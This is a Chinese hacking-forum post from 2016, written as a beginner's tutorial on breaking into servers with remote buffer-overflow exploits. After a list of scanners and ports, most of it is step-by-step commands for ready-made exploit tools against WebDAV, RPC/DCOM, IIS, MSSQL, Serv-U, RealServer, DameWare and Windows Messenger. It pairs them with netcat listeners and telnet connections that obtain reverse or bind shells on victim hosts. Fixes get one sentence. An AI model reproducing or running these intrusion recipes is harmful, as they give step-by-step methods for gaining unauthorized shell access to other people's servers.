黑帽联盟

标题: 新手经验分享:注入和溢出教程 [打印本页]

作者: yun 时间: 2016-11-6 01:45
标题: 新手经验分享:注入和溢出教程
溢出入侵

因为时间的原因我只介绍下这些漏洞的是如何利用的不介绍他们是怎么产生的至于怎么修补我会提一下的~~~

在介绍漏洞之前我先介绍几个很不错的扫描软件,毕竟扫描是基础

x-san
这个扫描软件我想大家不在陌生!!他是一个全方位扫描漏洞的软件,他主要是用于扫描漏洞的,当然其他方面的比如固定端口的扫描,ip的扫描也都
是可以的缺点就是速度太慢~~~

nmap
这个扫描软件功能比较强大!!是居于cmd界面操作的,只要按照他的提示使用即可,扫描的速度也比较的快,要想快速搞定一台服务器的朋友还是用
这个扫描软件比较好

x-way
这个扫描软件他的功能与其他的扫描软件不同!!不只是扫描还包括了很多的小工具!!比如查询器,猜解机...如果你要猜测什么账号和密码方面的
用这个就不错了

现在我在把常见的端口所对应的服务给大家列出来!!我觉得了解一下还是很重要的~~
80       全球信息网超文本传输协议(www)
110       pop3 服务器(邮箱发送服务器)
135 （tcp/ip）    查询服务 dns
139       共享资源端口(netbios-ssn)
143       imap电子邮件
443       安全服务
444       snpp
445       nt的共享资源新端口(139)
990       ftps
995       pop3s
1026    win2000 的 internet 信息服务
1243    sub-7木马
1524    ingreslock后门
3128    squid http代理服务器的默认端口
3389    win2000 远程登陆端口
4899    remote administrator [远程控制]
7626    冰河(木马) 默认端口
12345    netbus木马默认端口
12346    netbus木马默认端口
还有象流光呀什么的我想大家都比较熟悉了~~这里就不说了!!好了下面开始介绍漏洞和漏洞的利用方法!!其操作都是在cmd下面操作~~

1.webdav漏洞首先要开放80端口要安装了 iis
用到的工具 webdavx3
利用方法 webdavx3 目标主机ip

2.rpc漏洞工具 winrpcdcom
利用方法 winrpcdcom 目标主机ip（操作系统类型）目标主机ip

3.idq 首先要安装了iis

利用正向连接
1.溢出
2.telnet 登陆
telnet 目标主机ip 端口

反响连接
nc -l -p 本机端口
3.dcomrpc 溢出
漏洞利用 dcomrpc -d 目标主机ip [ortions] 有提示
[ortions] -l 6668 绑定6668端口在6668端口溢出

4.rpc long 文件名溢出
此漏洞可以通过 135（tcp/ip） 139 445 593 端口发起攻击
用 msdcomscanner.exe 软件扫描
漏洞利用 rpc2sbaa.exe os（操作系统类型0 1）目标主机ip

5.rpc locator 溢出漏洞
扫描软件 rpc-locator.exe ip段
看说明通过注册表改掉ip
在清空连接建立空连接
最好溢出 xlocator 操作系统类型

6.iis.asp 影射分块编码远程溢出漏洞 aspcode 溢出
扫描的时候扫描iis漏洞就可以了
漏洞利用
aspcode.exe 目标主机ip [asp文件]（iisstart.asp）开放的web端口是默认的80就不用填 win2000系统不用填写是winxp的话就要填写winxp

7.sql hello exploit 漏洞溢出攻击
首先扫描1433端口分析对方是否开放了1433端口
用dotpot port ready 1.6 来扫描是否开放1433端口
溢出工具 sqlhello
漏洞利用
sqlhello 反向连接工具 sqlhello 目标主机ip 目标主机端口1433 本机ip 本机端口

正向连接
工具 sqlhello2
sqlhello2 目标主机ip 目标主机端口1433

8. mssql sql2 溢出首先扫描1433端口是否开放
溢出工具 nc 和 sql2.exe
漏洞利用 sql2.exe 目标主机ip 本机ip 监听的本机端口 sql的版本一般为0

9.ser-u溢出
首先扫描 ftp弱口令
溢出工具 serv-u 3.x/4.x
serv -i 目标主机ip -t 0（操作系统类型）-u ftp登陆账号 -p ftp登陆密码 -f 21对方开放的端口默认为21 -s 溢出后反响连接的端口也就上自己的端口

10 电影网站入侵real server 溢出
开放了real networks real sever 服务的服务器开放后其开放的断口的默认值为主要检测554端口
rtsp 端口 554
pna 端口 7070
http 端口80
mms 端口 1755
监控端口 9090
管理端口自己设置
其他的端口号也可以改变
漏洞利用所要用到的工具 realex
溢出步骤
1. realex host(目标主机ip) 操作系统类型
2. telnet host 31337 绑定31337断口在第2个cmd窗口进行连接要先溢出在连接
主要用于入侵电影网站

11 dameware mina remote control 远程缓冲区溢出漏洞益处
首先扫描6129 端口是否开放如果开放才有可能存在这个漏洞
方法反响连接
工具利用 dameweird.exe 目标主机ip 本机ip 本地监听端口溢出版本

12.windows meida 远程益处漏洞媒体服务产生的一个漏洞
首先扫描1755 7007 6666 7778 端口是否开放
溢出工具 nc
media.exe
漏洞利用 media 目标主机ip -p 目标主机端口（80） -r 路径（/scripts/nsiislog.dll
nc -vv 目标主机ip 34816（确定的） -vv邦定34816端口的意思不是反响连接

13.windows messenger 服务的远程溢出(消息服务产生的漏洞)
扫描工具 messengerscan

方法 scanmsgr target=192.168.0.1-192.168.0.255（一个网段）
漏洞利用第一步
msghack -h 目标主机ip -v 目标主机操作系统 -i 目标主机语言版本 -s 操作系统的补丁号（0 1）-r 本机ip -p 监听的本机端口

第二步
nc -vv -l -p 本机端口 -vv邦定某个端口 -l -p反响连接或监听某个端口

综上所述溢出入侵的方法其实很简单要么正向连接要么反向连接
正向连接就是用工具将他直接溢出
反响连接那么就要用到 nc这个小工具因为反向连接是让目标主机来连接你,而不是你去连接目标主机,反向连接很容易逃过防火墙的检测..
当然还有其他方面的漏洞ms04 ms05 ,代理,输入法的漏洞....只要找到相应的工具将他溢出就可以了
以上的漏洞当然在实际电脑中很难找到了,我讲的只是漏洞利用的方法!!至于上面的漏洞怎么修复,大部分只要不断的升级打补丁就可以了~~

欢迎光临黑帽联盟 (https://bbs.cnblackhat.com/)